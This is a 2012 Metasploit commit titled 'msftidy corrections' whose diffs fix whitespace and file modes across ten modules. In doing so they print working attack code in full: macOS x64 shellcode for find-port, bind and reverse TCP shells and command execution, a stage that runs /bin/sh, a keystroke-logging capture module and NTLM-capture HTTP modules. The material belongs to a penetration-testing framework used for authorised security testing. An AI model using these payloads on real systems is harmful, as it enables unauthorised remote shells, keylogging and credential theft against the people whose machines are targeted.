msftidy corrections

unstable
sinn3r 2012-10-17 17:22:26 -05:00
parent 7b1c35624e
commit 201518b66f
10 changed files with 166 additions and 166 deletions

View File

@ -182,8 +182,8 @@ class Metasploit3 < Msf::Auxiliary
print_good("[#{cid}] Logging raw keystrokes to: #{@client_cache[cid][:path_raw]}")
end
::File.open( @client_cache[cid][:path_clean], "a") { |fd| fd.puts nice }
::File.open( @client_cache[cid][:path_raw], "a") { |fd| fd.write(real) }
::File.open( @client_cache[cid][:path_clean], "ab") { |fd| fd.puts nice }
::File.open( @client_cache[cid][:path_raw], "ab") { |fd| fd.write(real) }
if nice.length > 0
print_good("[#{cid}] Keys: #{nice}")

View File

@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
def on_request_uri(cli, request)
print_status("Request '#{request.uri}'...")
case request.method
when 'OPTIONS'
process_options(cli, request)
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
end
exploit()
end
def process_options(cli, request)
print_status("OPTIONS #{request.uri}")
headers = {

View File

@ -93,7 +93,7 @@ class Metasploit3 < Msf::Auxiliary
# Handles the initial requests waiting for the browser to try NTLM auth
def on_request_uri(cli, request)
case request.method
when 'OPTIONS'
process_options(cli, request)
@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary
parse_args()
exploit()
end
def process_options(cli, request)
print_status("OPTIONS #{request.uri}")
headers = {

View File

@ -38,50 +38,50 @@ module Metasploit3
'CPORT' => [ 32, 'n' ],
},
'Assembly' => <<EOS
xor rdi,rdi
xor rbx,rbx
mov bl,0x14
sub rsp,rbx
lea rdx,[rsp]
lea rsi,[rsp+4]
find_port:
push 0x34 ; getpeername
pop rax
syscall
inc rdi
cmp word [rsi+2],0x4142
jne find_port
dec rdi
push 2
pop rsi
dup2:
push 0x21 ; dup2
pop rax
syscall
dec rsi
jns dup2
mov rbx,rsi
mov ebx, 0x68732f41
mov eax,0x6e69622f
shr rbx,8
shl rbx,32
or rax,rbx
push rax
mov rdi,rsp
xor rsi,rsi
mov rdx,rsi
push 0x3b ; execve
pop rax
syscall
EOS
'Assembly' => %Q|
xor rdi,rdi
xor rbx,rbx
mov bl,0x14
sub rsp,rbx
lea rdx,[rsp]
lea rsi,[rsp+4]
find_port:
push 0x34 ; getpeername
pop rax
syscall
inc rdi
cmp word [rsi+2],0x4142
jne find_port
dec rdi
push 2
pop rsi
dup2:
push 0x21 ; dup2
pop rax
syscall
dec rsi
jns dup2
mov rbx,rsi
mov ebx, 0x68732f41
mov eax,0x6e69622f
shr rbx,8
shl rbx,32
or rax,rbx
push rax
mov rdi,rsp
xor rsi,rsi
mov rdx,rsi
push 0x3b ; execve
pop rax
syscall
|
}
))
end
def size
return 91
end
def size
return 91
end
end

View File

@ -38,10 +38,10 @@ module Metasploit3
payload =
"\x48\x31\xC0" + # xor rax,rax
"\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
call +
"/usr/bin/say\x00" +
call +
"/usr/bin/say\x00" +
say +
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
"\x4C\x8D\x57\x0D" + # lea r10,[rdi+0xd]
"\x48\x31\xD2" + # xor rdx,rdx
"\x52" + # push rdx

View File

@ -44,41 +44,41 @@ module Metasploit3
cmd = (datastore['CMD'] || '') << "\x00"
call = "\xe8" + [cmd.length].pack('V')
payload =
"\x48\x31\xFF" + # xor rdi,rdi
"\x57" + # push rdi
"\x48\x89\xE6" + # mov rsi,rsp
"\x6A\x04" + # push byte +0x4
"\x5A" + # pop rdx
"\x48\x8D\x4A\xFE" + # lea rcx,[rdx-0x2]
"\x4D\x31\xC0" + # xor r8,r8
"\x4D\x31\xC9" + # xor r9,r9
"\x48\xFF\xCF" + # dec rdi
"\x48\xFF\xC7" + # inc rdi
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
"\x0F\x05" + # loadall286
"\x81\x3C\x24" + # cmp dword [rsp],0x4e454d4f
datastore['TAG'] +
"\x75\xED" + # jnz 0x17
"\x48\x31\xC9" + # xor rcx,rcx
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
"\x0F\x05" + # loadall286
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
"\x48\x31\xF6" + # xor rsi,rsi
"\x0F\x05" + # loadall286
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
"\x48\xFF\xC6" + # inc rsi
"\x0F\x05" + # loadall286
"\x48\x31\xC0" + # xor rax,rax
"\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
call +
cmd +
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
"\x48\x31\xD2" + # xor rdx,rdx
"\x52" + # push rdx
"\x57" + # push rdi
"\x48\x89\xE6" + # mov rsi,rsp
"\x0F\x05" # loadall286
payload =
"\x48\x31\xFF" + # xor rdi,rdi
"\x57" + # push rdi
"\x48\x89\xE6" + # mov rsi,rsp
"\x6A\x04" + # push byte +0x4
"\x5A" + # pop rdx
"\x48\x8D\x4A\xFE" + # lea rcx,[rdx-0x2]
"\x4D\x31\xC0" + # xor r8,r8
"\x4D\x31\xC9" + # xor r9,r9
"\x48\xFF\xCF" + # dec rdi
"\x48\xFF\xC7" + # inc rdi
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
"\x0F\x05" + # loadall286
"\x81\x3C\x24" + # cmp dword [rsp],0x4e454d4f
datastore['TAG'] +
"\x75\xED" + # jnz 0x17
"\x48\x31\xC9" + # xor rcx,rcx
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
"\x0F\x05" + # loadall286
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
"\x48\x31\xF6" + # xor rsi,rsi
"\x0F\x05" + # loadall286
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
"\x48\xFF\xC6" + # inc rsi
"\x0F\x05" + # loadall286
"\x48\x31\xC0" + # xor rax,rax
"\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
call +
cmd +
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
"\x48\x31\xD2" + # xor rdx,rdx
"\x52" + # push rdx
"\x57" + # push rdi
"\x48\x89\xE6" + # mov rsi,rsp
"\x0F\x05" # loadall286
end
end

View File

@ -27,67 +27,67 @@ module Metasploit3
{
'Offsets' => { 'LPORT' => [ 31, 'n'] },
'Payload' =>
"\xB8\x61\x00\x00\x02" + # mov eax,0x2000061
"\x6A\x02" + # push byte +0x2
"\x5F" + # pop rdi
"\x6A\x01" + # push byte +0x1
"\x5E" + # pop rsi
"\x48\x31\xD2" + # xor rdx,rdx
"\x0F\x05" + # loadall286
"\x48\x89\xC7" + # mov rdi,rax
"\xB8\x68\x00\x00\x02" + # mov eax,0x2000068
"\x48\x31\xF6" + # xor rsi,rsi
"\x56" + # push rsi
"\xBE\x00\x02\x15\xB3" + # mov esi,0xb3150200
"\x56" + # push rsi
"\x48\x89\xE6" + # mov rsi,rsp
"\x6A\x10" + # push byte +0x10
"\x5A" + # pop rdx
"\x0F\x05" + # loadall286
"\xB8\x6A\x00\x00\x02" + # mov eax,0x200006a
"\x48\x31\xF6" + # xor rsi,rsi
"\x48\xFF\xC6" + # inc rsi
"\x49\x89\xFC" + # mov r12,rdi
"\x0F\x05" + # loadall286
"\xB8\x1E\x00\x00\x02" + # mov eax,0x200001e
"\x4C\x89\xE7" + # mov rdi,r12
"\x48\x89\xE6" + # mov rsi,rsp
"\x48\x89\xE2" + # mov rdx,rsp
"\x48\x83\xEA\x04" + # sub rdx,byte +0x4
"\x0F\x05" + # loadall286
"\x49\x89\xC5" + # mov r13,rax
"\x48\x89\xC7" + # mov rdi,rax
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
"\x48\x31\xC9" + # xor rcx,rcx
"\x51" + # push rcx
"\x48\x89\xE6" + # mov rsi,rsp
"\xBA\x04\x00\x00\x00" + # mov edx,0x4
"\x4D\x31\xC0" + # xor r8,r8
"\x4D\x31\xD2" + # xor r10,r10
"\x0F\x05" + # loadall286
"\x41\x5B" + # pop r11
"\x4C\x89\xDE" + # mov rsi,r11
"\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000
"\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000
"\xB8\xC5\x00\x00\x02" + # mov eax,0x20000c5
"\x48\x31\xFF" + # xor rdi,rdi
"\x48\xFF\xCF" + # dec rdi
"\xBA\x07\x00\x00\x00" + # mov edx,0x7
"\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002
"\x49\x89\xF8" + # mov r8,rdi
"\x4D\x31\xC9" + # xor r9,r9
"\x0F\x05" + # loadall286
"\x48\x89\xC6" + # mov rsi,rax
"\x56" + # push rsi
"\x4C\x89\xEF" + # mov rdi,r13
"\x48\x31\xC9" + # xor rcx,rcx
"\x4C\x89\xDA" + # mov rdx,r11
"\x4D\x31\xC0" + # xor r8,r8
"\x4D\x31\xD2" + # xor r10,r10
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
"\x0F\x05" + # loadall286
"\x58" + # pop rax
"\xFF\xD0" # call rax
"\xB8\x61\x00\x00\x02" + # mov eax,0x2000061
"\x6A\x02" + # push byte +0x2
"\x5F" + # pop rdi
"\x6A\x01" + # push byte +0x1
"\x5E" + # pop rsi
"\x48\x31\xD2" + # xor rdx,rdx
"\x0F\x05" + # loadall286
"\x48\x89\xC7" + # mov rdi,rax
"\xB8\x68\x00\x00\x02" + # mov eax,0x2000068
"\x48\x31\xF6" + # xor rsi,rsi
"\x56" + # push rsi
"\xBE\x00\x02\x15\xB3" + # mov esi,0xb3150200
"\x56" + # push rsi
"\x48\x89\xE6" + # mov rsi,rsp
"\x6A\x10" + # push byte +0x10
"\x5A" + # pop rdx
"\x0F\x05" + # loadall286
"\xB8\x6A\x00\x00\x02" + # mov eax,0x200006a
"\x48\x31\xF6" + # xor rsi,rsi
"\x48\xFF\xC6" + # inc rsi
"\x49\x89\xFC" + # mov r12,rdi
"\x0F\x05" + # loadall286
"\xB8\x1E\x00\x00\x02" + # mov eax,0x200001e
"\x4C\x89\xE7" + # mov rdi,r12
"\x48\x89\xE6" + # mov rsi,rsp
"\x48\x89\xE2" + # mov rdx,rsp
"\x48\x83\xEA\x04" + # sub rdx,byte +0x4
"\x0F\x05" + # loadall286
"\x49\x89\xC5" + # mov r13,rax
"\x48\x89\xC7" + # mov rdi,rax
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
"\x48\x31\xC9" + # xor rcx,rcx
"\x51" + # push rcx
"\x48\x89\xE6" + # mov rsi,rsp
"\xBA\x04\x00\x00\x00" + # mov edx,0x4
"\x4D\x31\xC0" + # xor r8,r8
"\x4D\x31\xD2" + # xor r10,r10
"\x0F\x05" + # loadall286
"\x41\x5B" + # pop r11
"\x4C\x89\xDE" + # mov rsi,r11
"\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000
"\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000
"\xB8\xC5\x00\x00\x02" + # mov eax,0x20000c5
"\x48\x31\xFF" + # xor rdi,rdi
"\x48\xFF\xCF" + # dec rdi
"\xBA\x07\x00\x00\x00" + # mov edx,0x7
"\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002
"\x49\x89\xF8" + # mov r8,rdi
"\x4D\x31\xC9" + # xor r9,r9
"\x0F\x05" + # loadall286
"\x48\x89\xC6" + # mov rsi,rax
"\x56" + # push rsi
"\x4C\x89\xEF" + # mov rdi,r13
"\x48\x31\xC9" + # xor rcx,rcx
"\x4C\x89\xDA" + # mov rdx,r11
"\x4D\x31\xC0" + # xor r8,r8
"\x4D\x31\xD2" + # xor r10,r10
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
"\x0F\x05" + # loadall286
"\x58" + # pop rax
"\xFF\xD0" # call rax
}
))
end

View File

@ -31,19 +31,19 @@ module Metasploit3
'LPORT' => [ 35, 'n']
},
'Payload' =>
"\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" +
"\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" +
"\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" +
"\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" +
"\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" +
"\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" +
"\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" +
"\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" +
"\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" +
"\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" +
"\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" +
"\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" +
"\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0"
"\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" +
"\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" +
"\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" +
"\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" +
"\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" +
"\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" +
"\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" +
"\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" +
"\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" +
"\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" +
"\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" +
"\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" +
"\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0"
}
))
end

View File

@ -26,11 +26,11 @@ module Metasploit3
'Stage' =>
{
'Payload' =>
"\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"+
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8"+
"\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69"+
"\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2"+
"\x52\x57\x48\x89\xe6\x0f\x05"
"\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"+
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8"+
"\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69"+
"\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2"+
"\x52\x57\x48\x89\xe6\x0f\x05"
}
))
end

View File

@ -181,18 +181,18 @@ class Metasploit3 < Msf::Post
found_key = false
basekey_set = ["HKLM\\SOFTWARE\\Oracle\\SYSMAN","HKLM\\SOFTWARE\\ORACLE\\KEY_XE"]
basekey_set.each do |basekey|
next if found_key
next if found_key
instances = registry_enumkeys(basekey)
if instances.nil? or instances.empty?
next
else
found_key = true
end
instances.each do |i|
if basekey.include?"KEY_XE"
val_ORACLE_SID = registry_getvaldata(basekey,"ORACLE_SID")
val_ORACLE_HOME = registry_getvaldata(basekey,"ORACLE_HOME")
val_ORACLE_HOME = registry_getvaldata(basekey,"ORACLE_HOME")
else
key = "#{basekey}\\#{i}"
val_ORACLE_SID = registry_getvaldata(key,"ORACLE_SID")